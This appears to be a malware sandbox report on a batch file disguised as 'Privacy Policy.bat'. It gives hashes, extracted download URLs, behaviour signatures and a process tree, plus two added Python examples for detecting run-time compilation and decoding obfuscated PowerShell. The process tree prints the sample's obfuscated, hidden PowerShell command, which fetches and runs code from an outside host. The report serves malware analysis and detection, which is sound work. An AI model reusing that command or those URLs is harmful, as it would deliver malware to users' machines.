Analysis
max time kernel
121s
max time network
122s
platform
windows7_x64
resource
win7-20240903-en
resource tags
arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
submitted
05/11/2024, 19:55
Static task
static1
Behavioral task
behavioral1
Sample
Privacy Policy.bat
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
Privacy Policy.bat
Resource
win10v2004-20241007-en
General
Target
Privacy Policy.bat
Size
6KB
MD5
25fa3f5f45eb6b3632353718d45b282c
SHA1
c691a71779737379d2276fe60151fdf9609a77e6
SHA256
306f51ede68339ed5d0e2dbd931e9d481a87f331a5341b0740d417fe9a311936
SHA512
f2d6c752fa37af2e6ca8b9c4c2ffe3f2e56a137f44af932f3b79640d53c8bf2903877c3fe944f61be983639701877bdbabd0aee80e8e87ac24373122f19e2772
SSDEEP
192:wOFqmyT20cb6MuFxH3o7DmTFWJalSN+g4MD:wOFqmbbyFxHaVJGSN+g4M
Malware Config
Extracted
https://raw.githubusercontent.com/poseidon1338/sp04/refs/heads/main/sbat2
https://chromeupdates.com/Env.zip
Signatures

Blocklisted process makes network request (2 IoCs)
flow  pid   Process
5     2576  powershell.exe
6     2576  powershell.exe

Suspicious behavior: EnumeratesProcesses (5 IoCs)
pid   Process
2576  powershell.exe
2576  powershell.exe
2576  powershell.exe
2576  powershell.exe
2576  powershell.exe

Suspicious use of AdjustPrivilegeToken (1 IoC)
description              pid   Process
Token: SeDebugPrivilege  2576  powershell.exe

Suspicious use of WriteProcessMemory (9 IoCs)
description                       pid   Process         procid_target
PID 3056 wrote to memory of 2576  3056  cmd.exe         31
PID 3056 wrote to memory of 2576  3056  cmd.exe         31
PID 3056 wrote to memory of 2576  3056  cmd.exe         31
PID 2576 wrote to memory of 1824  2576  powershell.exe  32
PID 2576 wrote to memory of 1824  2576  powershell.exe  32
PID 2576 wrote to memory of 1824  2576  powershell.exe  32
PID 1824 wrote to memory of 1660  1824  csc.exe         33
PID 1824 wrote to memory of 1660  1824  csc.exe         33
PID 1824 wrote to memory of 1660  1824  csc.exe         33
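The WriteProcessMemory rows are the writes a parent makes into a child it has just created, so they double as a parent/child record: cmd.exe (3056) starts powershell.exe (2576), which starts csc.exe (1824), which starts cvtres.exe (1660). A PowerShell host launching the C# compiler is the footprint of Add-Type compiling code at run time, and that is the relationship worth alerting on. The Python below is an added example, not part of the report or the sample: it parses the rows exactly as the report prints them, takes the PID-to-image map from the Processes section, rebuilds the tree and flags compiler processes that have a script host above them. The list of compiler and script-host image names is an assumption chosen for illustration.

```python
import re
from typing import Dict, List, Tuple

# The WriteProcessMemory rows copied from this report's Signatures section.
WPM_ROWS = """
PID 3056 wrote to memory of 2576 3056 cmd.exe 31
PID 3056 wrote to memory of 2576 3056 cmd.exe 31
PID 3056 wrote to memory of 2576 3056 cmd.exe 31
PID 2576 wrote to memory of 1824 2576 powershell.exe 32
PID 2576 wrote to memory of 1824 2576 powershell.exe 32
PID 2576 wrote to memory of 1824 2576 powershell.exe 32
PID 1824 wrote to memory of 1660 1824 csc.exe 33
PID 1824 wrote to memory of 1660 1824 csc.exe 33
PID 1824 wrote to memory of 1660 1824 csc.exe 33
"""

# PID -> image name, taken from the report's Processes section.
IMAGES: Dict[int, str] = {
    3056: "cmd.exe",
    2576: "powershell.exe",
    1824: "csc.exe",
    1660: "cvtres.exe",
}

# Assumed lists for the example: compilers a script host should not be
# launching on a workstation, and the script hosts we care about.
COMPILER_IMAGES = {"csc.exe", "vbc.exe", "cvtres.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe"}

# "PID <parent> wrote to memory of <child> <parent> <parent image> <target idx>"
ROW = re.compile(r"PID\s+(\d+)\s+wrote to memory of\s+(\d+)\s+\d+\s+(\S+)\s+\d+")


def parse_parents(rows: str) -> Dict[int, int]:
    """Map child pid -> parent pid.

    The repeated rows are the several writes a parent makes into a child it
    has just created, so they collapse to a single edge per child.
    """
    parents: Dict[int, int] = {}
    for m in ROW.finditer(rows):
        parent, child = int(m.group(1)), int(m.group(2))
        parents[child] = parent
    return parents


def ancestry(pid: int, parents: Dict[int, int], images: Dict[int, str]) -> List[str]:
    """Image names from the root of the tree down to pid, lower-cased."""
    chain: List[str] = []
    seen = set()
    while pid in images and pid not in seen:   # seen guards against pid reuse loops
        seen.add(pid)
        chain.append(images[pid].lower())
        pid = parents.get(pid, -1)
    chain.reverse()
    return chain


def runtime_compile_alerts(parents: Dict[int, int],
                           images: Dict[int, str]) -> List[Tuple[int, str]]:
    """Flag compiler processes that have a script host somewhere above them.

    powershell.exe -> csc.exe (-> cvtres.exe, which csc runs for resources)
    is what Add-Type leaves behind when it compiles C# at run time.
    """
    alerts: List[Tuple[int, str]] = []
    for pid, image in images.items():
        chain = ancestry(pid, parents, images)
        if image.lower() in COMPILER_IMAGES and SCRIPT_HOSTS & set(chain[:-1]):
            alerts.append((pid, " > ".join(chain)))
    return alerts


if __name__ == "__main__":
    for pid, chain in runtime_compile_alerts(parse_parents(WPM_ROWS), IMAGES):
        print(f"{pid}: {chain}")
```

Add-Type in a legitimate administration script produces the same csc.exe and cvtres.exe children, so in production this check is a scoring input rather than a verdict on its own: combine it with the other indicators this report shows for the same PID (hidden window, execution-policy bypass, an encoded command, and the outbound requests in the blocklisted-process signature).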
Processes

C:\Windows\system32\cmd.exe (PID 3056)
  cmd /c "C:\Users\Admin\AppData\Local\Temp\Privacy Policy.bat"
  - Suspicious use of WriteProcessMemory

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2576)
    powershell -ep by"pas"s -w hid"de"n -enc JAB1AHIAbAAgAD0AIAAnAGgAd"AB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0A"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"CAAfQApAA0ACgAgACAAIAANAAoAIAAgA"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"DQAKAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHM"AIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAZQAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAiAGAAIgAkAHIAdABjADEAYAAiACIAIAAtAE4AbwBOAGUAdwBXAGkAbgBkAG8AdwAgAA0ACgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAkAGUAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBgACIAJAByAHQAYwAyAGAAIgAiACAALQBOAG8ATgBlAHcAVwBpAG4AZABvAHcA
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe (PID 1824)
      "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\77uqfd2w.cmdline"
      - Suspicious use of WriteProcessMemory

      C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe (PID 1660)
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES99F0.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC9897.tmp"
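The powershell.exe command line above hides its switches by splitting them with quote pairs (by"pas"s, hid"de"n) and carries the script as a base64 blob over UTF-16LE, with the same quote-splitting applied inside the blob itself; the report shows the blob only in part. The Python below is an added example, not code from the report or from the sample: it normalises such a command line, locates the encoded-command switch under any of the spellings powershell.exe accepts, and decodes the blob while tolerating the truncation a report imposes. The full script it round-trips is a constructed stand-in; the only real data is the visible prefix of the encoded argument copied from the process tree above.

```python
import base64
import re
from typing import Optional

# Constructed stand-in for the script the sample launches (not the real payload,
# which the report truncates): a download URL, then Start-Process, same shape
# as the visible ends of the real blob.
SAMPLE_SCRIPT = (
    "$url = 'https://example.invalid/stage1'\r\n"
    "$e = 'C:\\Windows\\System32\\cmd.exe'\r\n"
    "Start-Process -FilePath $e -ArgumentList \"`\"$rtc1`\"\" -NoNewWindow\r\n"
)


def encode_command(script: str) -> str:
    """Encode a script the way powershell -EncodedCommand expects: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed command line in the same style as the one in the report.
SAMPLE_CMDLINE = 'powershell -ep by"pas"s -w hid"de"n -enc ' + encode_command(SAMPLE_SCRIPT)

# The visible start of the real command line from this report's process tree,
# quote splits included; everything after it is cut off in the report.
REPORT_PREFIX_CMDLINE = (
    'powershell -ep by"pas"s -w hid"de"n -enc '
    'JAB1AHIAbAAgAD0AIAAnAGgAd"AB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0A"'
)


def strip_split_quotes(cmdline: str) -> str:
    """Undo the by"pas"s / hid"de"n trick.

    A double quote with non-whitespace on both sides only breaks the token for
    the eye; the argument parser drops it, so we do the same before matching
    switches. A quote next to whitespace (a quoted path) is left alone.
    """
    return re.sub(r'(?<=\S)"(?=\S)', "", cmdline)


# powershell.exe accepts -EncodedCommand, -e, -ec and any unambiguous prefix,
# so match "-e..." and check the prefix ourselves.
SWITCH = re.compile(r"(?i)(?:^|\s)-(e[a-z]*)\s+([A-Za-z0-9+/=]+)")


def extract_encoded_command(cmdline: str) -> Optional[str]:
    """Return the base64 blob following the encoded-command switch, or None."""
    for m in SWITCH.finditer(strip_split_quotes(cmdline)):
        switch = m.group(1).lower()
        if switch == "ec" or "encodedcommand".startswith(switch):
            return m.group(2)
    return None


def decode_encoded_command(blob: str) -> str:
    """Decode an -EncodedCommand blob, tolerating one that was cut short.

    A base64 string whose length is 1 mod 4 cannot be decoded at all, so the
    dangling character is dropped, padding is recomputed, and a trailing odd
    byte (half a UTF-16 code unit) is discarded before decoding.
    """
    blob = re.sub(r"[^A-Za-z0-9+/]", "", blob)
    if len(blob) % 4 == 1:
        blob = blob[:-1]
    raw = base64.b64decode(blob + "=" * (-len(blob) % 4))
    if len(raw) % 2:
        raw = raw[:-1]
    return raw.decode("utf-16-le", errors="replace")


def decode_cmdline(cmdline: str) -> Optional[str]:
    """Full pipeline: de-obfuscate switches, find the blob, decode it."""
    blob = extract_encoded_command(cmdline)
    return decode_encoded_command(blob) if blob is not None else None


if __name__ == "__main__":
    print(strip_split_quotes(REPORT_PREFIX_CMDLINE).split(" -enc ")[0])
    print(repr(decode_cmdline(REPORT_PREFIX_CMDLINE)))
    print(decode_cmdline(SAMPLE_CMDLINE))
```

Run against the visible prefix, the decoder yields the start of a `$url = 'https://raw.gi` assignment, which lines up with the raw.githubusercontent.com URL in the extracted configuration; the rest of the script is not recoverable from this page. A detection that keys on the literal strings `-ep bypass` or `-w hidden` misses this sample entirely until the quotes are stripped, which is why the normalisation step comes before any matching.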
Network
Downloads

Filesize
3KB
MD5
eff24776c5ea4ca313b317a0a130e3f5
SHA1
6155d10acff863e48c6daf94abc717a01bd23f24
SHA256
8a882d47c662389785a26808ecf3290e8caca4d84bb199feb75a37a8eb94fd6d
SHA512
d526e3cb364a8847c908b3725a2d8ee8eb8f6230a9dac572d1b78596dff80bdf97f2fd94635e3621f94ef341b56e2573176dfc412847eb082dbfb81c62bb4e68

Filesize
7KB
MD5
bb0c6ea81fdbba60e594aa1bfa1164f5
SHA1
c06d029700e62b15c82fe6f4588856c9abcad119
SHA256
4f8d3318a69d82b50512e8e1c57f0ad721a3351590f95242665610774b7b2290
SHA512
f87e7b424c9303f21f77a0399568aba6730e32ea050f3df77c691e38dda91d6a6357aa51a0ebd971196b53c097f4fbc1bb0fe889a32aef9d5e2ae08645884238

Filesize
1KB
MD5
97cd5937f41ec0eac002770b4b081b9f
SHA1
a82bf85592e9c2c326e2c93076c4f0ded1d4f25c
SHA256
33cee92a699239271539105e70592133ee8393d50f5b04ff9598a9bd4539f56b
SHA512
a5b69c710fa8f1cf545c071b86843e92a9ddcdfb3523df0e5dc364e5ad472bbccd851e8045f37e4718fcb8f3646d09cdb14e9d73591fffaf8d711b7b28766f7a

Filesize
237B
MD5
a6e80541a483188dbce2f3d843fcbe4d
SHA1
a1f2e13a3314ab6a676751936c7b3b9a9fb9103e
SHA256
d5b10c7f3cbb62cbf4772a7b178c578c8abaa3fe9a7420decbff18d81f08ccd9
SHA512
6f60f86688dc256a668b6e3e8529820cf8253c47c6a1126f3097576f36b5c220f32febabce65e25dfa5b824dc2200b7ca7aca2c3bc3b8314cadb734a589b6337

Filesize
309B
MD5
7abe853e22ad6754fb8c310d701e426f
SHA1
fc936fa42b2bda340cec91cf3037d74be2fce6f2
SHA256
f5f3a6b2639b874b9421aa015abcc461e2731293875cdefde27fe6f9e9feaa14
SHA512
1e226ff9b3b767fca4711628e338171e43093be0a334e1e4b2f63ca9e8a1f2f62f0ffe225719acf0d3254eae39dccab95aa6a9bfdd91277523458a5a3cc4ecc1

Filesize
652B
MD5
edc11b3922d216360ca544fb4877562e
SHA1
4fa1dbc2b1c8af96b2afeb67811de2474a3fd431
SHA256
7b7dde2aeba3e015615f8d492c41e2a13ade1fd75c13afa478cd298ff40c802b
SHA512
59431ff0c390cc731a53c46132600182e4365883ae28c7c6f9c6fed702ee95f94742a321f32307cea7c04c8cab525c9f45293666c1c9e10fd88461ae6df6563a